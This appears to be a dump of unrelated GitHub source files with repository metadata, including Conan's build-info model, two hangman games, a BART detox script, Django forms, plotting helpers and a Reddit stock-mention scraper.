MockInfoProperty(\"cpp_info.names\")\n self.filenames = MockInfoProperty(\"cpp_info.filenames\")\n self.build_modules = MockInfoProperty(\"cpp_info.build_modules\")\n\n if set_defaults:\n self.includedirs = [\"include\"]\n self.libdirs = [\"lib\"]\n self.bindirs = [\"bin\"]\n\n def serialize(self):\n return {\n \"includedirs\": self._includedirs,\n \"srcdirs\": self._srcdirs,\n \"libdirs\": self._libdirs,\n \"resdirs\": self._resdirs,\n \"bindirs\": self._bindirs,\n \"builddirs\": self._builddirs,\n \"frameworkdirs\": self._frameworkdirs,\n \"system_libs\": self._system_libs,\n \"frameworks\": self._frameworks,\n \"libs\": self._libs,\n \"defines\": self._defines,\n \"cflags\": self._cflags,\n \"cxxflags\": self._cxxflags,\n \"sharedlinkflags\": self._sharedlinkflags,\n \"exelinkflags\": self._exelinkflags,\n \"objects\": self._objects,\n \"sysroot\": self._sysroot,\n \"requires\": self._requires,\n \"properties\": self._properties\n }\n\n @staticmethod\n def deserialize(contents):\n result = _Component()\n for field, value in contents.items():\n setattr(result, f\"_{field}\", value)\n return result\n\n @property\n def includedirs(self):\n if self._includedirs is None:\n self._includedirs = []\n return self._includedirs\n\n @includedirs.setter\n def includedirs(self, value):\n self._includedirs = value\n\n @property\n def srcdirs(self):\n if self._srcdirs is None:\n self._srcdirs = []\n return self._srcdirs\n\n @srcdirs.setter\n def srcdirs(self, value):\n self._srcdirs = value\n\n @property\n def libdirs(self):\n if self._libdirs is None:\n self._libdirs = []\n return self._libdirs\n\n @libdirs.setter\n def libdirs(self, value):\n self._libdirs = value\n\n @property\n def resdirs(self):\n if self._resdirs is None:\n self._resdirs = []\n return self._resdirs\n\n @resdirs.setter\n def resdirs(self, value):\n self._resdirs = value\n\n @property\n def bindirs(self):\n if self._bindirs is None:\n self._bindirs = []\n return self._bindirs\n\n @bindirs.setter\n def bindirs(self, value):\n self._bindirs = value\n\n @property\n def builddirs(self):\n if self._builddirs is None:\n self._builddirs = []\n return self._builddirs\n\n 
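# (Editor's note) Every cpp_info field in this class follows the same lazy
# pattern: it is stored as None until first read, so serialize() can tell
# "never set" apart from "explicitly empty", and is materialized as a list
# (or dict, for properties) on first access.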
@builddirs.setter\n def builddirs(self, value):\n self._builddirs = value\n\n @property\n def frameworkdirs(self):\n if self._frameworkdirs is None:\n self._frameworkdirs = []\n return self._frameworkdirs\n\n @frameworkdirs.setter\n def frameworkdirs(self, value):\n self._frameworkdirs = value\n\n @property\n def bindir(self):\n bindirs = self.bindirs\n assert bindirs\n assert len(bindirs) == 1\n return bindirs[0]\n\n @property\n def libdir(self):\n libdirs = self.libdirs\n assert libdirs\n assert len(libdirs) == 1\n return libdirs[0]\n\n @property\n def includedir(self):\n includedirs = self.includedirs\n assert includedirs\n assert len(includedirs) == 1\n return includedirs[0]\n\n @property\n def system_libs(self):\n if self._system_libs is None:\n self._system_libs = []\n return self._system_libs\n\n @system_libs.setter\n def system_libs(self, value):\n self._system_libs = value\n\n @property\n def frameworks(self):\n if self._frameworks is None:\n self._frameworks = []\n return self._frameworks\n\n @frameworks.setter\n def frameworks(self, value):\n self._frameworks = value\n\n @property\n def libs(self):\n if self._libs is None:\n self._libs = []\n return self._libs\n\n @libs.setter\n def libs(self, value):\n self._libs = value\n\n @property\n def defines(self):\n if self._defines is None:\n self._defines = []\n return self._defines\n\n @defines.setter\n def defines(self, value):\n self._defines = value\n\n @property\n def cflags(self):\n if self._cflags is None:\n self._cflags = []\n return self._cflags\n\n @cflags.setter\n def cflags(self, value):\n self._cflags = value\n\n @property\n def cxxflags(self):\n if self._cxxflags is None:\n self._cxxflags = []\n return self._cxxflags\n\n @cxxflags.setter\n def cxxflags(self, value):\n self._cxxflags = value\n\n @property\n def sharedlinkflags(self):\n if self._sharedlinkflags is None:\n self._sharedlinkflags = []\n return self._sharedlinkflags\n\n @sharedlinkflags.setter\n def sharedlinkflags(self, value):\n self._sharedlinkflags = value\n\n @property\n def exelinkflags(self):\n if self._exelinkflags is None:\n self._exelinkflags = []\n return self._exelinkflags\n\n @exelinkflags.setter\n def exelinkflags(self, value):\n self._exelinkflags = value\n\n @property\n def objects(self):\n if self._objects is None:\n self._objects = []\n return self._objects\n\n @objects.setter\n def objects(self, value):\n self._objects = value\n\n @property\n def sysroot(self):\n if self._sysroot is None:\n self._sysroot = \"\"\n return self._sysroot\n\n @sysroot.setter\n def sysroot(self, value):\n self._sysroot = value\n\n @property\n def requires(self):\n if self._requires is None:\n self._requires = []\n return self._requires\n\n @requires.setter\n def requires(self, value):\n self._requires = value\n\n @property\n def required_component_names(self):\n \"\"\" Names of the required components of the same package (not scoped with ::)\"\"\"\n if self.requires is None:\n return []\n return [r for r in self.requires if \"::\" not in r]\n\n def set_property(self, property_name, value):\n if self._properties is None:\n self._properties = {}\n self._properties[property_name] = value\n\n def get_property(self, property_name):\n if self._properties is None:\n return None\n try:\n return self._properties[property_name]\n except KeyError:\n pass\n\n def get_init(self, attribute, default):\n # Similar to dict.setdefault\n item = getattr(self, attribute)\n if item is not None:\n return item\n setattr(self, attribute, default)\n return default\n\n def merge(self, 
other, overwrite=False):\n \"\"\"\n @param overwrite:\n @type other: _Component\n \"\"\"\n def merge_list(o, d):\n d.extend(e for e in o if e not in d)\n\n for varname in _ALL_NAMES:\n other_values = getattr(other, varname)\n if other_values is not None:\n if not overwrite:\n current_values = self.get_init(varname, [])\n merge_list(other_values, current_values)\n else:\n setattr(self, varname, other_values)\n\n if other.requires:\n current_values = self.get_init(\"requires\", [])\n merge_list(other.requires, current_values)\n\n if other._properties:\n current_values = self.get_init(\"_properties\", {})\n current_values.update(other._properties)\n\n def set_relative_base_folder(self, folder):\n for varname in _DIRS_VAR_NAMES:\n origin = getattr(self, varname)\n if origin is not None:\n origin[:] = [os.path.join(folder, el) for el in origin]\n properties = self._properties\n if properties is not None:\n modules = properties.get(\"cmake_build_modules\") # Only this prop at this moment\n if modules is not None:\n assert isinstance(modules, list), \"cmake_build_modules must be a list\"\n properties[\"cmake_build_modules\"] = [os.path.join(folder, v) for v in modules]\n\n def deploy_base_folder(self, package_folder, deploy_folder):\n def relocate(el):\n rel_path = os.path.relpath(el, package_folder)\n return os.path.join(deploy_folder, rel_path)\n\n for varname in _DIRS_VAR_NAMES:\n origin = getattr(self, varname)\n if origin is not None:\n origin[:] = [relocate(f) for f in origin]\n properties = self._properties\n if properties is not None:\n modules = properties.get(\"cmake_build_modules\") # Only this prop at this moment\n if modules is not None:\n assert isinstance(modules, list), \"cmake_build_modules must be a list\"\n properties[\"cmake_build_modules\"] = [relocate(f) for f in modules]\n\n def parsed_requires(self):\n return [r.split(\"::\", 1) if \"::\" in r else (None, r) for r in self.requires]\n\n\nclass CppInfo:\n\n def __init__(self, set_defaults=False):\n self.components = defaultdict(lambda: _Component(set_defaults))\n self._package = _Component(set_defaults)\n\n def __getattr__(self, attr):\n # all cpp_info.xxx of not defined things will go to the global package\n return getattr(self._package, attr)\n\n def __setattr__(self, attr, value):\n if attr in (\"components\", \"_package\", \"_aggregated\"):\n super(CppInfo, self).__setattr__(attr, value)\n else:\n setattr(self._package, attr, value)\n\n def serialize(self):\n ret = {\"root\": self._package.serialize()}\n for component_name, info in self.components.items():\n ret[component_name] = info.serialize()\n return ret\n\n def deserialize(self, content):\n self._package = _Component.deserialize(content.pop(\"root\"))\n for component_name, info in content.items():\n self.components[component_name] = _Component.deserialize(info)\n return self\n\n def save(self, path):\n save(path, json.dumps(self.serialize()))\n\n def load(self, path):\n content = json.loads(load(path))\n return self.deserialize(content)\n\n @property\n def has_components(self):\n return len(self.components) > 0\n\n def merge(self, other, overwrite=False):\n \"\"\"Merge 'other' into self. 
'other' can be an old cpp_info object\n Used to merge Layout source + build cpp objects info (editables)\n @type other: CppInfo\n @param other: The other CppInfo to merge\n @param overwrite: New values from other overwrite the existing ones\n \"\"\"\n # Global merge\n self._package.merge(other._package, overwrite)\n # sysroot only of package, not components, first defined wins\n self._package.sysroot = self._package.sysroot or other._package.sysroot\n # COMPONENTS\n for cname, c in other.components.items():\n # Make sure each component created on the fly does not bring new defaults\n self.components.setdefault(cname, _Component(set_defaults=False)).merge(c, overwrite)\n\n def set_relative_base_folder(self, folder):\n \"\"\"Prepend the folder to all the directories definitions, that are relative\"\"\"\n self._package.set_relative_base_folder(folder)\n for component in self.components.values():\n component.set_relative_base_folder(folder)\n\n def deploy_base_folder(self, package_folder, deploy_folder):\n \"\"\"Prepend the folder to all the directories\"\"\"\n self._package.deploy_base_folder(package_folder, deploy_folder)\n for component in self.components.values():\n component.deploy_base_folder(package_folder, deploy_folder)\n\n def _raise_circle_components_requires_error(self):\n \"\"\"\n Raise an exception because of a requirements loop detection in components.\n The exception message gives some information about the involved components.\n \"\"\"\n deps_set = set()\n for comp_name, comp in self.components.items():\n for dep_name, dep in self.components.items():\n for require in dep.required_component_names:\n if require == comp_name:\n deps_set.add(\" {} requires {}\".format(dep_name, comp_name))\n dep_mesg = \"\\n\".join(deps_set)\n raise ConanException(f\"There is a dependency loop in \"\n f\"'self.cpp_info.components' requires:\\n{dep_mesg}\")\n\n def get_sorted_components(self):\n \"\"\"\n Order the components taking into account if they depend on another component in the\n same package (not scoped with ::). 
First less dependant.\n\n :return: ``OrderedDict`` {component_name: component}\n \"\"\"\n processed = [] # Names of the components ordered\n # TODO: Cache the sort\n while len(self.components) > len(processed):\n cached_processed = processed[:]\n for name, c in self.components.items():\n req_processed = [n for n in c.required_component_names if n not in processed]\n if not req_processed and name not in processed:\n processed.append(name)\n # If cached_processed did not change then detected cycle components requirements!\n if cached_processed == processed:\n self._raise_circle_components_requires_error()\n\n return OrderedDict([(cname, self.components[cname]) for cname in processed])\n\n def aggregated_components(self):\n \"\"\"Aggregates all the components as global values, returning a new CppInfo\"\"\"\n # This method had caching before, but after a ``--deployer``, the package changes\n # location, and this caching was invalid, still pointing to the Conan cache instead of\n # the deployed\n if self.has_components:\n result = _Component()\n # Reversed to make more dependant first\n for component in reversed(self.get_sorted_components().values()):\n result.merge(component)\n # NOTE: The properties are not aggregated because they might refer only to the\n # component like \"cmake_target_name\" describing the target name FOR THE component\n # not the namespace.\n # FIXME: What to do about sysroot?\n result._properties = copy.copy(self._package._properties)\n else:\n result = copy.copy(self._package)\n aggregated = CppInfo()\n aggregated._package = result\n return aggregated\n\n def check_component_requires(self, conanfile):\n \"\"\" quality check for component requires:\n - Check that all recipe ``requires`` are used if consumer recipe explicit opt-in to use\n component requires\n - Check that component external dep::comp dependency \"dep\" is a recipe \"requires\"\n - Check that every internal component require actually exist\n It doesn't check that external components do exist\n \"\"\"\n if not self.has_components and not self._package.requires:\n return\n # Accumulate all external requires\n external = set(r.split(\"::\")[0] for r in self._package.requires if \"::\" in r)\n internal = set(r for r in self._package.requires if \"::\" not in r)\n # TODO: Cache this, this is computed in different places\n for key, comp in self.components.items():\n external.update(r.split(\"::\")[0] for r in comp.requires if \"::\" in r)\n internal.update(r for r in comp.requires if \"::\" not in r)\n\n missing_internal = list(internal.difference(self.components))\n if missing_internal:\n raise ConanException(f\"{conanfile}: Internal components not found: {missing_internal}\")\n if not external:\n return\n # Only direct host (not test) dependencies can define required components\n direct_dependencies = [d.ref.name for d in conanfile.requires.values()\n if not d.build and not d.is_test and d.visible and not d.override]\n\n for e in external:\n if e not in direct_dependencies:\n raise ConanException(\n f\"{conanfile}: required component package '{e}::' not in dependencies\")\n # TODO: discuss if there are cases that something is required but not transitive\n for e in direct_dependencies:\n if e not in external:\n raise ConanException(\n f\"{conanfile}: Required package '{e}' not in component 'requires'\")\n\n @property\n def required_components(self):\n \"\"\"Returns a list of tuples with (require, component_name) required by the package\n If the require is internal (to another component), the require will be 
None\"\"\"\n # FIXME: Cache the value\n # First aggregate without repetition, respecting the order\n ret = [r for r in self._package.requires]\n for comp in self.components.values():\n for r in comp.requires:\n if r not in ret:\n ret.append(r)\n # Then split the names\n ret = [r.split(\"::\") if \"::\" in r else (None, r) for r in ret]\n return ret\n","repo_name":"conan-io/conan","sub_path":"conans/model/build_info.py","file_name":"build_info.py","file_ext":"py","file_size_in_byte":20345,"program_lang":"python","lang":"en","doc_type":"code","stars":7343,"dataset":"github-code","pt":"77"} +{"seq_id":"39039555025","text":"import math\nclass Solution:\n def MedianOfArrays(self, array1, array2):\n # code here\n if len(array2) < len(array1):\n self.MedianOfArrays(array2, array1)\n low = 0\n high = len(array1)\n while low <= high:\n partitionx = (low + high) // 2\n partitiony = int((len(array1) + len(array2)) / 2 - partitionx)\n\n maxLeftx = -math.inf if partitionx == 0 else array1[partitionx - 1]\n minRightX = math.inf if partitionx == len(array1) else array1[partitionx]\n\n maxlefty = -math.inf if partitiony == 0 else array2[partitiony - 1]\n minRightY = +math.inf if partitiony == len(array2) else array2[partitiony]\n\n if maxLeftx <= minRightY and maxlefty <= minRightX:\n if (len(array1) + len(array2)) % 2 == 0:\n return (max(maxLeftx, maxlefty) + min(minRightX, minRightY)) / 2\n else:\n return max(maxLeftx, maxlefty)\n elif maxLeftx > minRightY:\n high = partitionx - 1\n else:\n low = partitionx + 1\nsol = Solution()\nprint(sol.MedianOfArrays([1,2,3,5],[4,6]))\n","repo_name":"spartan289/PycharmProjects","sub_path":"learn/media-of2sorted-array.py","file_name":"media-of2sorted-array.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29456096579","text":"import random\n\ndef escoger_palabra_secreta():\n palabras = [\"python\", \"programacion\", \"computadora\", \"desarrollo\", \"algoritmo\"]\n palabra_secreta = random.choice(palabras)\n return palabra_secreta\n\ndef ocultar_letras(palabra, cantidad):\n letras_ocultas = random.sample(range(len(palabra)), cantidad)\n palabra_oculta = list(palabra)\n for indice in letras_ocultas:\n palabra_oculta[indice] = \"_\"\n return \"\".join(palabra_oculta)\n\ndef revisar_letra(palabra_secreta, palabra_oculta, letra):\n nueva_palabra_oculta = list(palabra_oculta)\n for indice, caracter in enumerate(palabra_secreta):\n if caracter == letra:\n nueva_palabra_oculta[indice] = letra\n return \"\".join(nueva_palabra_oculta)\n\nif __name__ == \"__main__\":\n palabra_secreta = escoger_palabra_secreta()\n letras_ocultas = random.randint(1, len(palabra_secreta))\n palabra_oculta = ocultar_letras(palabra_secreta, letras_ocultas)\n intentos = 7\n\n print(\"Bienvenido al juego de adivinar la palabra secreta.\")\n print(\"La palabra tiene\", len(palabra_secreta), \"letras.\")\n print(\"Tienes\", intentos, \"intentos para adivinar la palabra.\")\n\n while intentos > 0:\n print(\"\\nPalabra:\", palabra_oculta)\n letra = input(\"Ingresa una letra o arriésgate a decir la palabra completa: \")\n\n if len(letra) == 1:\n palabra_oculta = revisar_letra(palabra_secreta, palabra_oculta, letra)\n if letra not in palabra_secreta:\n intentos -= 1\n print(\"La letra\", letra, \"no está en la palabra. Te quedan\", intentos, \"intentos.\")\n elif len(letra) == len(palabra_secreta) and letra.lower() == palabra_secreta.lower():\n print(\"¡Felicidades! 
Adivinaste la palabra secreta.\")\n break\n else:\n print(\"La palabra ingresada no es válida.\")\n\n if intentos == 0:\n print(\"\\n¡Perdiste! La palabra secreta era:\", palabra_secreta)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema4_ej1/tema4_ej1_c89069016cbc84b9637ffd7501bbd72f.py","file_name":"tema4_ej1_c89069016cbc84b9637ffd7501bbd72f.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42674501028","text":"# Hangman game\n#\n\n# -----------------------------------\n# Helper code\n# You don't need to understand this helper code,\n# but you will have to know how to use the functions\n# (so be sure to read the docstrings!)\n\nimport random\nimport string\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef loadWords():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n\n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef chooseWord(wordlist):\n \"\"\"\n wordlist (list): list of words (strings)\n\n Returns a word from wordlist at random\n \"\"\"\n return random.choice(wordlist)\n\n# end of helper code\n# -----------------------------------\n\n# Load the list of words into the variable wordlist\n# so that it can be accessed from anywhere in the program\nwordlist = loadWords()\n\ndef isWordGuessed(secretWord, lettersGuessed):\n '''\n secretWord: string, the word the user is guessing\n lettersGuessed: list, what letters have been guessed so far\n returns: boolean, True if all the letters of secretWord are in lettersGuessed;\n False otherwise\n '''\n # FILL IN YOUR CODE HERE...\n for char in secretWord:\n if char not in lettersGuessed:\n return False\n return True\n\n\n\ndef getGuessedWord(secretWord, lettersGuessed):\n\n stringI = \"\"\n for char in secretWord:\n if char in lettersGuessed:\n stringI+=char+\" \"\n else:\n stringI+=\" _ \"\n\n return stringI\n\n\n\n\ndef getAvailableLetters(lettersGuessed):\n\n allletters = string.ascii_lowercase\n stringer = \"\"\n for letters in allletters:\n if letters not in lettersGuessed:\n stringer+= letters\n return stringer\n\n\n\n\ndef hangman(secretWord):\n\n\n\n secretWordlength = len(secretWord)\n # allowing user to make 8 guesses when they guess wrong\n numOfGuesses = 8\n lettersGuessed = []\n availableLetters = getAvailableLetters(lettersGuessed)\n print(\"Welcome To the HangMan Interactive Game\")\n print(\"The Word I am thinking of has {} letters.\".format(secretWordlength))\n print(\"---------------\")\n\n while True:\n print(\"You Have\",numOfGuesses,\"Left.\")\n availableLetters = getAvailableLetters(lettersGuessed)\n print(\"Available Letters:\",availableLetters)\n guesser = input(\"Please Guess a Letter: \")\n guess = guesser.lower()\n\n if guess in secretWord and guess not in lettersGuessed:\n lettersGuessed.append(guess)\n print(\"Good Guess : \",getGuessedWord(secretWord, lettersGuessed))\n\n elif guess not in secretWord and guess not in lettersGuessed:\n lettersGuessed.append(guess)\n numOfGuesses -=1\n print(\"Sorry that letter is not in my word\")\n elif guess in lettersGuessed:\n\n print(\"Sorry but you have already Guessed that letter try Again\")\n\n\n\n if 
isWordGuessed(secretWord, lettersGuessed):\n            print(\"Congrats, you won! The word is\", secretWord)\n            return\n        if numOfGuesses <= 0:\n            print(\"Sorry, you ran out of guesses. The word was\", secretWord)\n            return\n        print(\" \")\n\n\n\nsecretWord = chooseWord(wordlist).lower()\nhangman(secretWord)\n","repo_name":"chafiknaceri/Interactive-Hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23951597997","text":"# Import necessary libraries and modules\nimport torch\nfrom transformers import BartForConditionalGeneration, AutoTokenizer\nimport numpy as np\nimport torch.nn as nn\n\n# Check if a CUDA-enabled GPU is available, otherwise use CPU\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# Define the base model name and the specific model name to be used\nbase_model_name = 'facebook/bart-base'\nmodel_name = 'SkolkovoInstitute/bart-base-detox'\n\n# Initialize a tokenizer using the base model name\ntokenizer = AutoTokenizer.from_pretrained(base_model_name)\n\n# Initialize a BART model for conditional text generation using the specific model name\nmodel = BartForConditionalGeneration.from_pretrained(model_name)\n\n# Prompt the user to input the text they want to detoxify\nprint(\"Enter the text you want to detoxify:\")\ntext = input()\n\n# Tokenize the user's input text using the tokenizer and return it as PyTorch tensors\ntokenized_text = tokenizer(text, return_tensors='pt')\n\n# Generate detoxified text using the pre-trained model with a maximum of 512 new tokens\ngenerated_tokens = model.generate(**tokenized_text, max_new_tokens=512)\n\n# Decode the generated tokens into a readable detoxified text, skipping special tokens\nprint(tokenizer.decode(generated_tokens.squeeze(), skip_special_tokens=True))\n","repo_name":"naryst/PMDL_assignment1","sub_path":"src/models/BART_inference.py","file_name":"BART_inference.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73719195769","text":"# -*- coding: utf-8 -*-\n\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\n\n\nfrom accounting_core.models import AccountingYear\n\n\nclass ImportForm(forms.Form):\n\n    year = forms.ModelChoiceField(label=_(u'L\\'année comptable'), queryset=AccountingYear.objects.filter(deleted=False).exclude(status='3_archived'))\n    file = forms.FileField(label=_(u'Le fichier avec la compta'))\n    type = forms.ChoiceField(label=_(u'Le type de fichier'), choices=[\n        ('tab_2016', _(u'Format TAB 2016')),\n        ('csv_2014', _(u'Format CSV 2014')),\n    ])\n\n\nclass BudgetFilterForm(forms.Form):\n    start = forms.DateField(label=_(u'Filtrer du'))\n    end = forms.DateField(label=_(u'au'))\n\n    def clean(self):\n\n        cleaned_data = super(BudgetFilterForm, self).clean()\n\n        if 'start' in cleaned_data and 'end' in cleaned_data and cleaned_data['start'] > cleaned_data['end']:\n            raise forms.ValidationError(_(u'La date de fin ne peut pas être avant la date de début !'))\n\n        return cleaned_data\n","repo_name":"ArcaniteSolutions/truffe2","sub_path":"truffe2/accounting_main/forms2.py","file_name":"forms2.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"72563152889","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport 
numpy as np\nfrom matplotlib.pyplot import cm\nimport seaborn as sns\n\nsns.set_style(\"white\")\nsns.set_context(\"poster\")\n\nOFFSET = 400\nBIN_X = np.arange(OFFSET/4,510,10) - 0.25\nBIN_Y = {\n '181-185': np.arange(21) * 0.03 + 0.25,\n '181-162': np.arange(40) * 0.02 + 0.05,\n '284-225': np.arange(45) * 0.05 + 2.8,\n '287-225': np.arange(45) * 0.05 + 2.8,\n '181': np.arange(11) - 0.5,\n '185': np.arange(11) - 0.5,\n '274': np.arange(11) - 0.5,\n '275': np.arange(11) - 0.5,\n 'W1W2': np.arange(8) - 0.5,\n 'ADP': np.arange(3) - 0.5,\n 'ADP0': np.arange(3) - 0.5,\n}\nAXIS = {\n '181-185': [OFFSET/4,500,0.25,0.85],\n '181-162':[OFFSET/4,500,0.05,0.83],\n '284-225':[OFFSET/4,500,2.8,5.0],\n '287-225':[OFFSET/4,500,2.8,5.0],\n '181':[OFFSET/4,500,-0.5,9.5],\n '185':[OFFSET/4,500,-0.5,9.5],\n '274':[OFFSET/4,500,-0.5,9.5],\n '275':[OFFSET/4,500,-0.5,9.5],\n 'W1W2':[OFFSET/4,500,-0.5,6.5],\n 'ADP': [OFFSET/4,500,-0.5,1.5],\n 'ADP0': [-0.5,4.5,-0.5,1.5],\n}\nXLABEL = 't (nanoseconds)'\n\ndef plot_2dhist(key, x_axis, y_data, weights, title, ylabel, filename):\n bin_x = BIN_X\n xlabel = XLABEL\n key = str(key)\n if key == 'ADP0':\n bin_x = np.arange(6) - 0.5\n xlabel = 'RUN'\n fig1 = plt.figure()\n plt.hist2d(x_axis[y_data > -1],y_data[y_data > -1],bins=[bin_x,BIN_Y[key]],weights=weights[y_data > -1],cmap=plt.get_cmap('inferno'))\n plt.title(title)\n plt.ylabel(ylabel)\n plt.xlabel(xlabel)\n plt.colorbar()\n plt.axis(AXIS[key])\n plt.savefig(filename,dpi=300)\n plt.close(fig1)\n print('Saved %s' % filename)\n\n","repo_name":"choderalab/AURKA_UMN","sub_path":"scripts/old/analyze/plot_function.py","file_name":"plot_function.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30769671945","text":"from tkinter import *\nimport time\nimport connection\nfrom tkinter import messagebox\n\n\ndef main_account_screen():\n \n main_screen = Tk() # create a GUI window \n main_screen.resizable(False, False)\n main_screen.geometry(\"300x220+600+100\") # set the configuration of GUI window \n main_screen.title(\"Registro de fotografias\") # set the title of GUI window\n \n # create a Form label \n Label(text=\"RUT\", bg=\"white\", width=\"300\", height=\"2\", font=(\"Calibri\", 13)).pack() \n Label(text=\"\").pack() \n\n # \n name = StringVar()\n fileName_lable = Label(main_screen, text=\"Rut cliente\")\n fileName_lable.pack()\n\n fileName_entry = Entry(main_screen, textvariable=name)\n fileName_entry.pack()\n \n spare_lable = Label(main_screen, text=\" \")\n spare_lable.pack()\n\n # create a register button\n \n\n def saveRut():\n global rut\n rut = name.get()\n\n llamada = connection.callUsers()\n if llamada.select_user(rut)==\"ERROR\":\n messagebox.showerror(\"Alerta\",\"Rut invalido\")\n\n else:\n time.sleep(1)\n main_screen.destroy()\n\n Button(text=\"Register\", height=\"2\", width=\"30\", command=saveRut).pack()\n\n main_screen.mainloop() # start the GUI\n \nmain_account_screen() # call the main_account_screen() function\n\n","repo_name":"igmm98/RepoPython","sub_path":"savePhotos.py","file_name":"savePhotos.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4249637184","text":"import re\n\nf = open(\"./demo.txt\",mode=\"r\", encoding=\"utf-8\")\ncontent = f.read()\nf.close()\n\n\nstart = content.find(')') #开始截取位置\nprint('start',start)\n\ncontent = re.sub('浙ICP备05019169号',\"\",content)\n\npattern = 
re.compile(r'\\d+')\nlastNum = pattern.findall(content).pop(-1)\nprint('lastNum',lastNum)\nend = content.rindex(lastNum)\nprint('end',end)\ncontent = content[start:end] #末尾截取位置\n\n# print(content)\ncontent = re.sub(r'[^\\u4e00-\\u9fa5\\u9fa6-\\u9fef]+', \"\",content)\ncontent = re.sub(r'\\u672a\\u5206\\u7c7b',\"\",content)\nprint('',content)\n# content = re.sub(r'\\n', \"\",content)\n# content = content.split(',')\nem = ''\ni=''\n# for a in content:\n#     a='\"'+a+'\"'+':'+'\"\",\\n'\n#     print(a)\n#     em+=a\n# print(content.encode(\"unicode_escape\"))\nfor a in content:\n    i = str(a.encode(\"unicode_escape\"))\n    i=i.replace(\"b'\\\\\",\" \")\n    em+=i\n# print(em)\ncontent = re.sub(r\"[' ]\", \"\",em)\nfo = open(\"./hah.txt\", \"w\")\n# fo.write(content.encode('utf-8'))\nfo.write(content)\nfo.close()\n\n\n\n\n","repo_name":"fsrm-h/searchTitle","sub_path":"fl/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35694749843","text":"from psaw import PushshiftAPI\nimport config\nimport datetime\nimport psycopg2\nimport psycopg2.extras\nimport re\n\ntodays_date = datetime.date.today()\n\nconnection = psycopg2.connect(host=config.DB_HOST, database=config.DB_NAME, user=config.DB_USER, password=config.DB_PASS)\ncursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\ncursor.execute(\"\"\"\n    SELECT * FROM stock\n\"\"\")\nrows = cursor.fetchall()\n\nstocks = {}\nfor row in rows:\n    stocks[row['symbol']] = row['id']\n\n\napi = PushshiftAPI()\n\n# Subtract 10 days with a timedelta so early-month dates cannot produce an invalid day number\nstart_time = int((datetime.datetime(todays_date.year, todays_date.month, todays_date.day) - datetime.timedelta(days=10)).timestamp())\n\nsubmissions = api.search_submissions(after=start_time,\n                                    subreddit='wallstreetbets',\n                                    filter=['url','author', 'title', 'subreddit'],\n                                    )\n\n\n\nfor submission in submissions:\n#    caps = []\n#    try:\n#        caps = re.findall('([A-Z]+(?=\\s[A-Z]+)(?:\\s[A-Z]+)+)', submission.title)\n#        caps = caps[0].split()\n#        print('--------------------------------{}-------------------'.format(caps))\n#    except Exception:\n#        pass\n#\n    words = submission.title.split()\n    cashtags = list(set(filter(lambda word: word.lower().startswith('$'), words)))\n#    cashtags.extend(caps)\n\n    if len(cashtags) > 0:\n        print(cashtags)\n        print(submission.title)\n\n        for cashtag in cashtags:\n            cashtag = cashtag.replace('$', '')\n            cashtag = cashtag.title()\n            if cashtag in stocks:\n                submitted_time = datetime.datetime.fromtimestamp(submission.created_utc).isoformat()\n                print(cashtag)\n\n                try:\n                    cursor.execute(\"\"\"\n                        INSERT INTO mention (dt, stock_id, message, source, url)\n                        VALUES (%s, %s, %s, 'wallstreetbets', %s)\n                    \"\"\", (submitted_time, stocks[cashtag], submission.title, submission.url))\n\n                    connection.commit()\n                except Exception as e:\n                    print(e)\n                    connection.rollback()\n","repo_name":"daveh11/wall_street_bets_analysis","sub_path":"search_wsb.py","file_name":"search_wsb.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73746803450","text":"import os\nimport click\nimport logging\n\nfrom stactools.jrc_gsw import stac\nfrom stactools.jrc_gsw.collections import (\n    AGGREGATED,\n    MONTHLY_HISTORY,\n    MONTHLY_RECURRENCE,\n    ROOT,\n    YEARLY_CLASSIFICATION,\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef create_jrc_gsw_command(cli):\n    \"\"\"Creates the joint research centre - global surface water command line utility.\"\"\"\n\n    @cli.group(\n        \"jrc-gsw\",\n        
